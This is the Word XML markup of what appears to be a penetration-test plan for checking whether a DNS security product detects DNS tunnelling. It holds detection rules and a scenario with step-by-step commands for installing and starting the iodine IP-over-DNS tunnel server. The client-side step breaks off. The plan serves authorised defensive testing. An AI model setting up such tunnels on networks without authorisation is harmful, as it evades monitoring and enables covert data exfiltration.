      <w:tr w:rsidR="005B2212" w14:paraId="121F6345" w14:textId="77777777">
        <w:tblPrEx>
          <w:tblCellMar>
            <w:top w:w="0" w:type="dxa"/>
            <w:bottom w:w="0" w:type="dxa"/>
          </w:tblCellMar>
        </w:tblPrEx>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3200" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
          </w:tcPr>
          <w:p w14:paraId="7E4E68EB" w14:textId="77777777" w:rsidR="005B2212" w:rsidRDefault="002170E7">
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t>DNS-E12b</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3200" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
          </w:tcPr>
          <w:p w14:paraId="211C001A" w14:textId="77777777" w:rsidR="005B2212" w:rsidRDefault="002170E7">
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t>Large DNS response anomaly</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3200" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
          </w:tcPr>
          <w:p w14:paraId="4A3C9B52" w14:textId="77777777" w:rsidR="005B2212" w:rsidRDefault="002170E7">
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t>Average response size &gt;200 bytes to same domain → ALERT (normal A record responses are ~40 bytes)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="005B2212" w14:paraId="00F33480" w14:textId="77777777">
        <w:tblPrEx>
          <w:tblCellMar>
            <w:top w:w="0" w:type="dxa"/>
            <w:bottom w:w="0" w:type="dxa"/>
          </w:tblCellMar>
        </w:tblPrEx>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3200" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          </w:tcPr>
          <w:p w14:paraId="593016AC" w14:textId="77777777" w:rsidR="005B2212" w:rsidRDefault="002170E7">
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t>DNS-E12c</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3200" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          </w:tcPr>
          <w:p w14:paraId="24E29EB3" w14:textId="77777777" w:rsidR="005B2212" w:rsidRDefault="002170E7">
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t>Bidirectional DNS data flow</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3200" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          </w:tcPr>
          <w:p w14:paraId="24EF072E" w14:textId="77777777" w:rsidR="005B2212" w:rsidRDefault="002170E7">
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t>High entropy in both query labels AND response payloads → ALERT (indicates interactive tunnel)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="0D31BC3D" w14:textId="77777777" w:rsidR="005B2212" w:rsidRDefault="002170E7">
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="480F2A4E" w14:textId="77777777" w:rsidR="005B2212" w:rsidRDefault="002170E7">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:before="300" w:after="150"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="2E5090"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>7.4 Scenario 13: iodine — IP-over-DNS Tunnel</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08D6D5E2"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5B2212" w14:paraId="593727AE" w14:textId="77777777">
        <w:tblPrEx>
          <w:tblCellMar>
            <w:top w:w="0" w:type="dxa"/>
            <w:bottom w:w="0" w:type="dxa"/>
          </w:tblCellMar>
        </w:tblPrEx>
        <w:trPr>
          <w:tblHeader/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4800" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="1B2A4A"/>
          </w:tcPr>
          <w:p w14:paraId="34D7EB4F" w14:textId="77777777" w:rsidR="005B2212" w:rsidRDefault="002170E7">
            <w:pPr>
              <w:spacing w:before="60" w:after="60"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t>Attribute</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4800" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="1B2A4A"/>
          </w:tcPr>
          <w:p w14:paraId="5A6B15FB" w14:textId="77777777" w:rsidR="005B2212" w:rsidRDefault="002170E7">
            <w:pPr>
              <w:spacing w:before="60" w:after="60"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t>Detail</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="005B2212" w14:paraId="6544DE18" w14:textId="77777777">
        <w:tblPrEx>
          <w:tblCellMar>
            <w:top w:w="0" w:type="dxa"/>
            <w:bottom w:w="0" w:type="dxa"/>
          </w:tblCellMar>
        </w:tblPrEx>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4800" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          </w:tcPr>
          <w:p w14:paraId="33FA34D3" w14:textId="77777777" w:rsidR="005B2212" w:rsidRDefault="002170E7">
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t>Threat Level</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4800" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          </w:tcPr>
          <w:p w14:paraId="20C94ABC" w14:textId="77777777" w:rsidR="005B2212" w:rsidRDefault="002170E7">
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t>Very High — APT</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="005B2212" w14:paraId="64C8211C" w14:textId="77777777">
        <w:tblPrEx>
          <w:tblCellMar>
            <w:top w:w="0" w:type="dxa"/>
            <w:bottom w:w="0" w:type="dxa"/>
          </w:tblCellMar>
        </w:tblPrEx>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4800" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
          </w:tcPr>
          <w:p w14:paraId="1E0929B8" w14:textId="77777777" w:rsidR="005B2212" w:rsidRDefault="002170E7">
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t>Tool</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4800" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
          </w:tcPr>
          <w:p w14:paraId="60923A01" w14:textId="77777777" w:rsidR="005B2212" w:rsidRDefault="002170E7">
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t>iodine</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="005B2212" w14:paraId="1D7C8EF8" w14:textId="77777777">
        <w:tblPrEx>
          <w:tblCellMar>
            <w:top w:w="0" w:type="dxa"/>
            <w:bottom w:w="0" w:type="dxa"/>
          </w:tblCellMar>
        </w:tblPrEx>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4800" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          </w:tcPr>
          <w:p w14:paraId="6CAB2CD3" w14:textId="77777777" w:rsidR="005B2212" w:rsidRDefault="002170E7">
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t>What It Does</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4800" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          </w:tcPr>
          <w:p w14:paraId="7DE38BF1" w14:textId="77777777" w:rsidR="005B2212" w:rsidRDefault="002170E7">
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t>Creates a full IP tunnel (like a VPN) over DNS</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="005B2212" w14:paraId="1292D7F4" w14:textId="77777777">
        <w:tblPrEx>
          <w:tblCellMar>
            <w:top w:w="0" w:type="dxa"/>
            <w:bottom w:w="0" w:type="dxa"/>
          </w:tblCellMar>
        </w:tblPrEx>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4800" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
          </w:tcPr>
          <w:p w14:paraId="4E8581A8" w14:textId="77777777" w:rsidR="005B2212" w:rsidRDefault="002170E7">
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t>Why It Matters</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4800" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
          </w:tcPr>
          <w:p w14:paraId="72CBE165" w14:textId="77777777" w:rsidR="005B2212" w:rsidRDefault="002170E7">
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t>Once established, any IP traffic can flow through DNS — SSH, HTTP, file transfers, anything</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="267373A6" w14:textId="77777777" w:rsidR="005B2212" w:rsidRDefault="005B2212">
      <w:pPr>
        <w:spacing w:before="100" w:after="100"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="36287023" w14:textId="77777777" w:rsidR="005B2212" w:rsidRDefault="002170E7">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:before="200" w:after="100"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="404040"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>How DNS Works in This Scenario</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4862B778" w14:textId="77777777" w:rsidR="005B2212" w:rsidRDefault="002170E7">
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:t>iodine creates a virtual network interface (tun device) on both client and server. All IP traffic sent through this interface is fragmented, encoded, and transmitted as DNS queries. The server reassembles the fragments and routes the traffic. This is essen</w:t>
      </w:r>
      <w:r>
        <w:t>tially a VPN over DNS. The traffic volume is much higher than one-shot exfiltration, and the queries are continuous with very large payloads. iodine uses NULL, TXT, CNAME, or MX record types and automatically selects the most efficient one.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E255EBF" w14:textId="77777777" w:rsidR="005B2212" w:rsidRDefault="005B2212">
      <w:pPr>
        <w:spacing w:before="100" w:after="100"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4AB08B4B" w14:textId="77777777" w:rsidR="005B2212" w:rsidRDefault="002170E7">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:before="200" w:after="100"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="404040"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Prerequisites</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71DCA824" w14:textId="77777777" w:rsidR="005B2212" w:rsidRDefault="002170E7">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="2E5090"/>
        </w:rPr>
        <w:t xml:space="preserve">•  </w:t>
      </w:r>
      <w:r>
        <w:t>Colleague's server must run the iodine server daemon</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="392B5C7F" w14:textId="77777777" w:rsidR="005B2212" w:rsidRDefault="002170E7">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="2E5090"/>
        </w:rPr>
        <w:t xml:space="preserve">•  </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">iodine client on your </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>pentest</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> workstation (available via apt: </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>sudo</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> apt install iodine)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F8851DF" w14:textId="77777777" w:rsidR="005B2212" w:rsidRDefault="002170E7">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="2E5090"/>
        </w:rPr>
        <w:t xml:space="preserve">•  </w:t>
      </w:r>
      <w:r>
        <w:t>Root/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>sudo</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> access on both sides (iodine creates tun interfaces)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3BB9BAC5" w14:textId="77777777" w:rsidR="005B2212" w:rsidRDefault="002170E7">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="2E5090"/>
        </w:rPr>
        <w:t xml:space="preserve">•  </w:t>
      </w:r>
      <w:r>
        <w:t>NS record for a subdomain pointing to colleague's server (e.g., t.yourcolleague.com NS → colleague-server-</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>ip</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F3EDA7A" w14:textId="77777777" w:rsidR="005B2212" w:rsidRDefault="005B2212">
      <w:pPr>
        <w:spacing w:before="100" w:after="100"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="09505C08" w14:textId="77777777" w:rsidR="005B2212" w:rsidRDefault="002170E7">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:before="200" w:after="100"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="404040"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Step-by-Step Setup — Server Side (Colleague)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6AE74CFC" w14:textId="77777777" w:rsidR="005B2212" w:rsidRDefault="002170E7">
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Step 1: </w:t>
      </w:r>
      <w:r>
        <w:t>Install iodine:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46815496" w14:textId="77777777" w:rsidR="005B2212" w:rsidRDefault="002170E7">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F5F5F5"/>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>sudo</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> apt i</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>nstall iodine</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A96CDD7" w14:textId="77777777" w:rsidR="005B2212" w:rsidRDefault="005B2212">
      <w:pPr>
        <w:spacing w:before="100" w:after="100"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="366398A8" w14:textId="77777777" w:rsidR="005B2212" w:rsidRDefault="002170E7">
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Step 2: </w:t>
      </w:r>
      <w:r>
        <w:t>Start the iodine server:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25E43FEC" w14:textId="77777777" w:rsidR="005B2212" w:rsidRDefault="002170E7">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F5F5F5"/>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>sudo</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iodined</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> -f -c -P </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>your_password</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> 10.0.0.1 </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>t.CUSTOM</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>_DOMAIN</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="407500E0" w14:textId="77777777" w:rsidR="005B2212" w:rsidRDefault="002170E7">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F5F5F5"/>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t># -f = foreground (so you can see output)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63AF576E" w14:textId="77777777" w:rsidR="005B2212" w:rsidRDefault="002170E7">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F5F5F5"/>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t># -c = disable client IP checking</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58BA10CB" w14:textId="77777777" w:rsidR="005B2212" w:rsidRDefault="002170E7">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F5F5F5"/>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t># -P = password for the tunnel</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="752322EB" w14:textId="77777777" w:rsidR="005B2212" w:rsidRDefault="002170E7">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F5F5F5"/>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t># 10.0.0.1 = tunnel server IP address</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FFF9624"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t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>t.CUSTOM</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>_DOMAIN</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> = the delegated subdomain</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B2FDE2F" w14:textId="77777777" w:rsidR="005B2212" w:rsidRDefault="005B2212">
      <w:pPr>
        <w:spacing w:before="100" w:after="100"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="266B9BA0" w14:textId="77777777" w:rsidR="005B2212" w:rsidRDefault="002170E7">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:before="200" w:after="100"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="404040"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Step-by-Step Setup — Client Side (Your Workstation)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="093E07FE" w14:textId="77777777" w:rsidR="005B2212" w:rsidRDefault="002170E7">
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Step 3: </w:t>
      </w:r>
      <w:r>
        <w:t>Install iodine:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BC55DF6" w14:textId="77777777" w:rsidR="005B2212" w:rsidRDefault="002170E7">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F5F5F5"/>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>sudo</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> apt install iodine</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DB2732B" w14:textId="77777777" w:rsidR="005B2212" w:rsidRDefault="005B2212">
      <w:pPr>
        <w:spacing w:before="100" w:after="100"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="51F9196D" w14:textId="77777777" w:rsidR="005B2212" w:rsidRDefault="002170E7">
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Step 4: </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Connect through </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>EfficientIP</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C515E83" w14:textId="77777777" w:rsidR="005B2212" w:rsidRDefault="002170E7">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F5F5F5"/>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>sudo</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
